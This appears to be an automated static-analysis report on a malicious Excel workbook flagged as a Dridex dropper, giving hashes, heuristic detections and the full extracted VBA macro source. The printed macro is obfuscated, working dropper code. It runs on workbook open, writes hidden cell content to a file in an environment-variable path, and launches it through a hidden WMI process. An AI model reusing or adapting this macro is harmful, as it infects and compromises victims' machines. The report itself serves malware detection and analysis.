Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 07bfbdbb934f8346…

MALICIOUS

Office (OOXML)

568.4 KB
Created: 2021-03-03 13:04:16 UTC
Authoring application: Microsoft Excel 15.0300
First seen: 2022-07-02
MD5: b22f59ae61f29489b476dc42bc9779be
SHA-1: 18a2d07806b316f0c8e42b407a4a0f464303fdef
SHA-256: 07bfbdbb934f834666d945a498701cae9444131ae5f10cf6ef6716917763cbde
240 Risk Score

Heuristics 8

  • ClamAV: Doc.Dropper.Dridex-9845759-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Dridex-9845759-0
  • VBA project inside OOXML medium 4 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
    Set Zptr_55C_mLD2 = GetObject(QfXxqWD).SpawnInstance_
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Private Sub Workbook_Open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    MPt9_VXy = Environ(VwIq7Cx8w)
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename Kind Source Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 13528 bytes
SHA-256: c3d22dc3c9241344f6aa065ff4cc35b659925c6687ee2fd9b996f346dcb749c1
Detection
ClamAV: No threats found
Obfuscation or payload: likely
198 of 379 identifiers look randomly generated (e.g. 'xlCylinderBarStacked100') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
'DYnIt1yoGIWGV bzNLy_AiFn_bdaz_kIQ MOw5xCO y7bDw_fk0 pvZhOrhJUEZ rBJqjMGZDVtntbC RfPKt_0Oe_Cf6 kOSN_yt1_fT4 mVEP_oUOC_uWo
ILVxWKs = Join(Array(Ffnz_mBM_t43_BUV, F3QK_5w1a & "L9n8G_z1cx_YuE", "A7hms_UFg Wh00Yzl4XoRA2ovC" & "HOIs_V6j_Qif" & "AzeC1TfVeQj2IDM", mL8MwMGXCuj & "iA39k8m SUQbR_f0eu_pm7_qWJp e3kCI6jo7aPj" + "roOo_U5c_IKiB_hWb BAmV_M8sK Fbga_Fnyx", "bykaB0uW" & LQ8Ea_oI2e + SYWqnXK7jKD, "CHEfGFzlgpEf5t3", "N026T414f J210dtaC" + "G3G70_70x_J1c_ix5j XZ0z5TPbmoj ZSUNg_MX3N_16e_lfe" + "ZXfK_z0r_0jj_0Baz", "Lpcp_r6KN eknYa_Ubz" & "awiua7xXgLCgpT"))
vFVx0LMHOzzByE = YWrl9OdTIroRKLlu.zr0MT_2t4p_MvjZ
End Sub

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "YWrl9OdTIroRKLlu"
Attribute VB_Base = "0{C79D48C3-D899-46F6-B515-8368F78E1F0E}{293607B5-1B3D-4D58-9A52-84940DD76A66}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function zr0MT_2t4p_MvjZ()


'UGOMMBqSqyXzGKN qP1Cj_mxh XwqF_zlNO_0Vmv WSVC_gR3r_IPLi qjsru_m1g o1b99_h2V_7E6I JQwcw_wrb_6Cv F8OO_43E8_0qS_oBj o5v5M_cA0f
Dim NFpkWodGRPV As String
NFpkWodGRPV = X0bucocBPr4.CFHbt_xcjN_59W.Text
Kb9FOUMQxIELDbyQZ = EIC8LsOj0 & MPt9_VXy(YWrl9OdTIroRKLlu.pOkjn_kMt9_VWpE_5lRM) & P1rg_wyt0 & YWrl9OdTIroRKLlu.DGAR_1itd_Pnh_usj & JHm4_SD7_aMv2_UaXz & Xqau_0vEd_W1my_Qqb & T3KRIN3mIA9tt & Ia6pg_WVO_cTKh & PCAkbg9LVYYn83SK.p92QzU80 & IZbrn3eX & LS0U8rxIE & M5TML_rxYA_xD6_3smJ.O8s0m_q7yG_XrkS
Open Kb9FOUMQxIELDbyQZ For Binary As #CLng((xlKatakana Xor xlAsRequired))
LOyrL582sv53 = YX1hf_euZ4_UGr
Put #CLng((xlNoButton Xor xlDirect)), , NFpkWodGRPV
Close #CLng((xlDatabase And xlOutline))
MZUpf_qHD_yLpQ = IgizgClhgjRj.Mbg8_e2OW_GFw8(YWrl9OdTIroRKLlu.H8eWVhl329uuPQQc(WdK1_tH8_PDA_Ggz), X0bucocBPr4.O2LiGUGb(Wq4UjmG0Od8F0rAr) & Kb9FOUMQxIELDbyQZ & Chr(34), AzQN4ANO8smLkQ.Zptr_55C_mLD2(X0bucocBPr4.T9Eob_PPL7_MkKy(Hs0meitS)))
Po2m_WEvJ = Len(Join(Array(J8J8FGb36ohk8pr ^ GO4eFOBPo & "hz392EaSPSN1bb0", YOR0CvCD, "LHyP2KwdeVJ2 WqzVc2Krr", KceObKwplai8, PuXoZKdB7hZKwQ & DKmuolvj)))
End Function
Function H8eWVhl329uuPQQc(AGWUKa0eKE0sK)
H8eWVhl329uuPQQc = Join(Array(Chr(CLng((Not (-545 + (0.361087510620221 * 1177))))) & ChrW(CLng(((0.772340425531915 * 940) + -621))) & Chr(CLng((AscW("n")))) _
 & Chr(CLng((AscW("m")))) & ChrW(CLng(((0.176258992805755 * 556) Or (4.50867052023121E-02 * 865)))) _
 & Chr(CLng((0.475982532751092 * xlDialogDefineStyle))) & Chr(CLng((Not (0.111854684512428 * -1046)))) & Chr(CLng((Not -116))) & ChrW(CLng(((xlDialogSeriesOptions + -525#) Or xlClipboardFormatToolFacePICT))) & Chr(CLng(((0.16802906448683 * -1101) + 299))) _
 & Chr(CLng((Asc("o")))) _
 & ChrW(CLng((-105 + (-0.815094339622642 * -265)))) _
 & ChrW(CLng((AscW("t")))) & ChrW(CLng((624 + -532))) _
 & Chr(CLng((9.36613055818354E-02 * 1057))) & Chr(CLng((AscW("i")))) & Chr(CLng((AscW("m")))) & ChrW(CLng((xlDialogMove + (-350 - -206#)))) & Chr(CLng((((-985 + 985.454297407913) * -1466) + 716))) & Chr(CLng((xl3DColumnStacked100 Or xlLinkStatusMissingSheet))) & Chr(CLng((((545 + 263#) - 744#) Or xlRangeAutoFormatReport3))) & Chr(CLng((AscW("i")))) & Chr(CLng((xlDialogWorkbookUnhide + (0.332928311057108 * (-1051 - -228#))))) & Chr(CLng((((1.47763157894737 * 760) + -890#) - 182))) _
 & ChrW(CLng((AscW(xlExtractData)))) _
 & Chr(CLng(((847 - 752#) And xlDialogRowHeight))) & ChrW(CLng(((0.215873015873016 * 315) Xor xlTextWindows))) & Chr(CLng((Asc("r")))) & ChrW(CLng((9.25 * xlLeftBrace))) _
 & Chr(CLng((AscW("c")))) & Chr(CLng(((0.118823529411765 * 850) Or xlRangeAutoFormatTable6))) _
 & ChrW(CLng((Asc("s")))) _
 & ChrW(CLng(((xlDialogReplaceFont - 133.735023041475) * xlDialogPivotFieldUngroup)))))
YjbM_bam_NJke_hseP = Weekday(gNRJ5RRkJFS)
End Function
Function DGAR_1itd_Pnh_usj()
DGAR_1itd_Pnh_usj = Join(Array(ChrW(CLng((-0.127777777777778 * -720))) _
 ))
End Function
Function pOkjn_kMt9_VWpE_5lRM()
pOkjn_kMt9_VWpE_5lRM = Join(Array(Chr(CLng(((xlDialogEditionOptions - 150#) And xlCylinderBarStacked100))) _
 + Chr(CLng((((1.02497502497502 * 1001) + -912#) Xor xlPlusValues))) + Chr(CLng((xlPrintInPlace Or xlCylinderBarStacked))) + ChrW(CLng((xlConeColStacked Or xlButtonControl))) _
 + Chr(CLng((0.306962025316456 * 316))) + Chr(CLng((116 And xlDialogRowHeight))) + ChrW(CLng((1026 - 929)))))
Debug.Print yDXnM_EPpz_SKDu
End Function
Function MPt9_VXy(VwIq7Cx8w)
For GQId45sFY5AFc = 0 To CLng((Not ((0.161803713527851 * 1131) - 805#)))
I05QjdBxaIRT = GQId45sFY5AFc
Next GQId45sFY5AFc
'pYPos_rho_9mQ ROy4yJVOtys BBbS3_fyQ O7GT_4k52_G06r Hprz_455K QilUKeupksfGBT8
qhBR_GOhr_Txo = mVKQ_j1a_46q
W77yoHVL = Array("m24thc5tFl7 PjkZZ_bVUg_qd9G R7jlgLUWl" & DDY9_qwHm_V3r & SvSV_m9Eb_W4o_cgju, YizU_T3jQ_h6Gf_kbqa + VRfX_V0pL_akOJ_2X8P & "K9gbV_5xfi Z5KkP_4iD_nCx4 dnvz_mIW", NG5UClgRaAQkPrl + ZIIONcbYM, "ia2JZ3jndPMO" & vJ5O_FkY_7qH_IBm)
mpFY3Q4tGlW = GNgzocfWEMBIhQ
Amt2_tIF_Sto_5Pvp = Split(PHlRZ_YJa_zOg_qwD, vjNYt_Rd1_F2qH, HCZUu_3Nq_4fj)
MPt9_VXy = Environ(VwIq7Cx8w)
YdO0qWxgS = CLng((Not -248)) > CLng((Asc("Z")))
QGhm_76m_iHn = Weekday(A2VD_IrgD_qn5_QY5c)
TQOEZ_dM7_rxgT_8cT = Abs(CLng(((410 - -655#) Or (1.17746262935991 * 2609))))
zf4h_v6v0 = YwoFDHWM
X46DD0K = Len(Join(Array(QJAyqZFmXce0BwVx, "PK61B_UbR ZLuN_unlS", "RT8H_Kxod_po8R_cQy JgYZ7G3tfXv" & "hJIqH0diBPlK0Q WsrFNLd", AS5AnrQYjTOr & "B0FHmqHf1RDKFJ", HohqjuAb & "bRMWvozOC FIZV1_w13_5Om_lEgE Dg0D_MjH" + "eZqs_KNEe_GTc_tCrJ XORdX_7f9 FhqL2xxiteYKjdNt", utLL_MaP_BvZ & "sZ8m177SmQEH9gHbZ")))
mKxbJR3gAlpGzE06 = Replace(ZEnFM7TCI5xWgGn, gt4IdjMH, TzxggvQn07J0fZ)
mJJNrlsBNaNyKHB = Join(Array(G0kW_0xB, X6OmrJhIlKDDbst + EwU0bgchXGpstOt, "Qm97_QDap_T6bF K6u8_rIe_M9dB_0h74" + "ZVVX_iWS Ebe5YUNtdAg UKw7r_m6sJ_IIW" & "O7ah_TKlU_2uw_xqOo WT8qpGbjIAT", R0dYuKdJST0x & "ATOAE_cBVu_dWTN S7nBH_Yee_xyt_KaG7", zmN5w07T, KfqW_qk0 & "kfZif_38H9_xk3o_BI3" & wwg0n_jyz2_tVX_hR85, "VG6R_EZAI_Cwg EUh3RhUOthTn" & UBpyLlSDcZJ - Plv3F_8oUI_GII_zYxX))
Ri0Xr8vqxhog4LI = CLng((-0.540849673202614 * -612)) < CLng(((0.622304050499737 * -1901) + xlDialogUnhide))
wFNvNzS6he0e = Join(Array(S01A3_1oLY_ZnY_6wA ^ VGf0r_eP0_DKCg & QQ4rI_M4z, NTI1c7dZ0aoR & "MD2Cq_rJKA_iby_AqM", G3hKA_JhAW_4nn3 * h0N2ZUtUft8))
End Function

Attribute VB_Name = "PCAkbg9LVYYn83SK"
Attribute VB_Base = "0{3ED9202C-982F-4B38-9507-D84A0E88DDD2}{973B3331-844A-4459-9A31-C5A61EFBF0A9}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function p92QzU80()
p92QzU80 = Hex(CLng((CLng((((122461 - -529#) - 117#) And 87659)) - CLng((24352 Xor 53915)) + CLng((56767 And (36806 - -53#)))) * Rnd + CLng((36673 + -390))))
End Function
Function Qzx3_Sqf_pwN()
Qzx3_Sqf_pwN = Join(Array(ChrW(CLng((xlRangeAutoFormatTable7 And (0.105809128630705 * 482))))))
End Function

Attribute VB_Name = "M5TML_rxYA_xD6_3smJ"
Function O8s0m_q7yG_XrkS()
O8s0m_q7yG_XrkS = Join(Array(ChrW(CLng(((-1.67777777777778 * -90) + -105))) _
 & ChrW(CLng(((2.61607183733265E-04 * (-1428 - -861#)) * -809))) _
 & ChrW(CLng((xlSourceAutoFilter Or (xlDialogLabelProperties - 321#)))) _
 & ChrW(CLng((Asc("l"))))))
Tnz1_V8G_QS0 = Ey1JD66oz
Debug.Print JpNWFbny
End Function


Attribute VB_Name = "X0bucocBPr4"
Attribute VB_Base = "0{F72CD3FE-D863-40DE-822E-77873993641D}{946DAE10-BF0E-484E-A26C-73081140D0FF}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function T9Eob_PPL7_MkKy(OTir_Q5a)
T9Eob_PPL7_MkKy = Join(Array(Chr(CLng((AscW("w")))) + Chr(CLng((Not ((0.725862068965517 * -580) - -315#)))) + ChrW(CLng((AscW("n")))) _
 + ChrW(CLng((Asc("m")))) _
 + ChrW(CLng((xlMetric Xor xlPieOfPie))) _
 + Chr(CLng((xlTableBody Or ((1910 - 825#) + -984#)))) + Chr(CLng((-309 + (-1.26112759643917 * -337)))) + Chr(CLng((AscW("s")))) _
 + ChrW(CLng((519 - ((-542 - -543.945147679325) * 237)))) + Chr(CLng((Not -93))) + ChrW(CLng((AscW("r")))) + Chr(CLng((Asc("o")))) + ChrW(CLng((((1182 + -876#) - 305.525641025641) * 234))) + Chr(CLng((357 + (-281 + 40#)))) + Chr(CLng((Not (0.105322763306908 * -883)))) + Chr(CLng((0.103448275862069 * 957))) + Chr(CLng(((-239 - -343#) Or xlCylinderBarStacked100))) + Chr(CLng((0.439516129032258 * 248))) + Chr(CLng((Not -119))) + ChrW(CLng((AscW(xlExpression)))) _
 + ChrW(CLng((-61 - -119))) + Chr(CLng((xlDialogFillGroup + (-0.224206349206349 * xlDialogSeriesShape)))) + Chr(CLng(((10.9358974358974 * -78) + 958))) + Chr(CLng((xlPyramidBarStacked Or (0.132780082987552 * (0.35080058224163 * xlDialogWebOptionsFonts))))) + ChrW(CLng((-335 - (xlDialogPrintPreview - (0.69327251995439 * 877))))) + ChrW(CLng((648 - (245 - -353#)))) + Chr(CLng((Not ((-1.01822192995482E-03 * -799) * -118)))) + Chr(CLng((AscW("P")))) _
 + ChrW(CLng((652 + (-374 + -164#)))) + ChrW(CLng((AscW("o")))) + Chr(CLng((766 - xlDialogNewWebQuery))) + Chr(CLng((xlAnyGallery Xor (xlDialogFormatChart + (-3.16216216216216 * xlPyramidBarStacked100))))) + Chr(CLng((AscW("s")))) + Chr(CLng(((503 + -400#) Xor xlClipboardFormatBIFF3))) + Chr(CLng((xlDownBars Xor (-8.88610763454318E-02 * -799)))) + Chr(CLng((AscW("t")))) + Chr(CLng((xlDialogNew Xor (-639 + 661#)))) + ChrW(CLng(((581 + -483#) Or (xlDialogCombination + -57#)))) _
 + ChrW(CLng((-0.261261261261261 * -444))) + ChrW(CLng((AscW("u")))) + ChrW(CLng((AscW("p"))))))
BgffJDjV = Array("T94ZQ_QBB_rnf4_ox0W MFr1bNuTt", "KrObWNDh EqaOvAjG ZYeoOMJ3d" & I1d3_pi0_C8Fe_447, "aSWO_yjn")
Gt29d_CYwl_hoFu = Weekday(JLT3_CV2v_heb)
End Function
Function O2LiGUGb(IDgdgFbVHl0hU)
O2LiGUGb = Join(Array(ChrW(CLng((xlPieOfPie Or xlDialogInsert))) _
 & ChrW(CLng((Not -110))) & Chr(CLng((Not (592 + -698#)))) & Chr(CLng(((749 - 715#) Or xlCylinderBarStacked100))) _
 & ChrW(CLng((824 - 792))) & Chr(CLng(((-5.3202614379085 * -153) + (-696 - 7#)))) & ChrW(CLng((922 + -807))) _
 & Chr(CLng((-205 + 237))) _
 & Chr(CLng((-138 + (761 + -520#)))) _
 & Chr(CLng(((-0.198333333333333 * -600) And xlPyramidBarClustered))) & Chr(CLng(((930 - 844#) Xor (168 - 134#)))) _
 & ChrW(CLng(((359 + -324#) Xor xlWPG))) & ChrW(CLng((xlRangeAutoFormatTable2 Xor xlDrawingObject))) _
 & ChrW(CLng(((-0.164763458401305 * (1.33260869565217 * -460)) Xor xlNotYetReviewed))) & ChrW(CLng((AscW("o")))) _
 & Chr(CLng((115 And 122))) & Chr(CLng((AscW("m")))) & Chr(CLng((Not (448 - 546#)))) _
 & Chr(CLng((AscW("t")))) & Chr(CLng(((-656 - -688#) Or xlIntlAddIn))) _
 & Chr(CLng((-125 + (1.60606060606061 * xlConeColClustered)))) _
 ))
End Function


Attribute VB_Name = "AzQN4ANO8smLkQ"
Function Zptr_55C_mLD2(QfXxqWD)
Set Zptr_55C_mLD2 = GetObject(QfXxqWD).SpawnInstance_
KVhioDHjR = Split(DTh1_UjVU_WlT, NDE4_bzR_uHLh_ACi, C15h_1FNH_nUaV_nak)
Zptr_55C_mLD2.ShowWindow = CLng((Not (-132 - (658 + -777#))))
VR4bC_qNw = Replace(Ho4kALrv, qPKl_Sin_9BH, SS1L6_gOXl)
nrfo_EKsc = CLng((Not (-1031 + 397#))) > CLng((xlDialogActiveCellFont Xor (-0.195448460508701 * (xlCylinderCol + -845#))))
End Function

Attribute VB_Name = "IgizgClhgjRj"
Attribute VB_Base = "0{B1B897E9-9067-4160-8996-278990E7EC75}{0E77E6AA-E8E3-47F7-8F40-262413E140C4}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function Mbg8_e2OW_GFw8(X5ox_iWyc_Vxr_GuEw, PBuJ_ULKc_nyc2, OgxD_HFC_uOx)
Debug.Print LPLc_qR1
dizJJlAi = Weekday(FWczYT8L)
tR7mq4sYWK4Jg = Split(ZGUL3NPKocAT0, ADYSrjbXP00R, JXBNS2DLH6EY)
'znVx_zlkT_0o9_c0D YzO5mYVvPb ssqhbpX8eZb6nS eyZz_D3Yk MYuyqIX VYNvn9H J0VXo3haIfVfB0FK pnas_Fmf
Qclg_2vMF_Ken7 = InStr(Hk2RWfcw, ndCGV_H4Y_dko_cQW, Ugpkg_5ub_SjrA_S76E)
S6U6GomBFu5c = Year(QSdRvWH7)
Svft_03gj_Wd8C = Split(bqfa0vpy, UTk8_e1y_ZVaz, slfgza7)
N6DwA_3k4_eaj = MzgAIwjO0n2ORuMt
'x5ThLRTx eRS4_73Dm_K0vd Mg7AQs8VEdV O6SgP_6Ea_Pcj_e0h KIyea_6U5i UHw3_gK6_Dw2k_GLTW nHdlG1ZFwtBToX
For M9SStvZ9nqeAKx = 0 To CLng((4.61797752808989 * 267))
P9kviSG7C2sxs = M9SStvZ9nqeAKx
Next M9SStvZ9nqeAKx
With GetObject(X5ox_iWyc_Vxr_GuEw)
COoPoAo = Year(A5Bk_0ZS5_FLj_LJsa)
cJhb_vLk = Len(Join(Array("YfMFPfkrV jYLh_E2MI" & IFo9_ZJM_XS2_6SA & q7ZRcPJ0)))
.Create PBuJ_ULKc_nyc2, Null, OgxD_HFC_uOx
End With
HXlnfnZXFRe = InStr(jVqX2_bwf, Y4YlM_4kgD_T2Z_F0IZ, EZ20_pRMI)
UlJbnNz4tb0yzN = Year(PX9HQRFK)
'A8zu_reV_6Qkn VsAztDqY2DY0zuh3N BQCE_X6CG D0tH_p5J_S9eQ_Uh1 cL9Ke_QBR_lfW_LQJq
z7q6V_tpI = CLng((xlBarClustered And (-36 + 99#))) > CLng(((250 + 771#) + -622))
oTXKgffexLG = "nzsy_XVDj_aYh_okXx"
I79VaFXmNC8 = InStr(SHrl_ZPV, zi2KR_Xt3_JIVC_DRO, b7M0lTJkNJmAX)
u8J0IH08F = Weekday(ELsNu_0ajk_CMk)
'vCh6_vPTd VDXiuvG9o9CR LljMeS8 FMF4w_WK1U e7mUJCgttQ5gI0 KrJcPkqEHm6xU hm7aS_ZyD7_nfnk_IW79
End Function
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 60928 bytes
SHA-256: 864b468501aa7bf6819c5ecfed94c374be3aab739e5e1c8bcc5a30f81c3b6ca5
Detection
ClamAV: Doc.Dropper.Dridex-9845759-0
Obfuscation or payload: unlikely